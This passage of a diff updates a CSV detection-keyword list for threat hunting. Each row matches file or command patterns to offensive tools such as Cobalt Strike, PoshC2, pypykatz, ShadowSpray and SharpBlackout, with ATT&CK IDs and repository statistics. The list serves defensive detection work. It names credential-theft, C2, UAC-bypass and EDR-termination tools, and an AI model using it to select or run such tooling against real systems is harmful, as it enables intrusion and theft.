+"*Sha-2-*512.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Sha-2-256.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Sha-2-384.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*shadawck/glit*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" -"*shadawck/recon-archy*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","12","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" -"*shadow_copy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*shadawck/recon-archy*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*shadow_copy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*shadowclock*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*shadowclone *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*shadowcoerce.py *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*shadowcoerce_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*shadowcopy enum*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*shadowcoerce_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*shadowcopy enum*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*shadowdump.*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*ShadowForge.py*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*ShadowForgeC2-main*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" @@ -16478,22 +16661,22 @@ "*ShadowSpray.Kerb*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*ShadowSpray.sln*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*ShadowSpray-master*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" -"*ShadowUser/scvhost.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*ShadowUser/scvhost.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*shareenum.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*shareenumeration*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*shareenumeration*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*SharepointExploiter.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*SharepointSiteExploiter.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" -"*Shares/cme_spider_plus*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*Shares/finduncshar_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Shares/cme_spider_plus*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Shares/finduncshar_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*Sharp Compile*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","0","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" -"*Sharp_v4_x64*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Sharp_v4_x86*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Sharp_v4_x64*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Sharp_v4_x86*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*sharpadidnsdump.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpAdidnsdumpManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpAdidnsdumpMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SharpAllowedToAct.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*sharpapplocker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*SharpAppLocker.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpAllowedToAct.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharpapplocker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpAppLocker.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpAzbelt-main*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","1","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*SharpBlackout* -p *","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*SharpBlackOut.csproj*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" @@ -16506,7 +16689,7 @@ "*SharpBlock.exe*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*SharpBlock.sln*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*SharpBypassUAC*","offensive_tool_keyword","AD exploitation cheat sheet","Use SharpBypassUAC e.g. from a CobaltStrike beacon","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 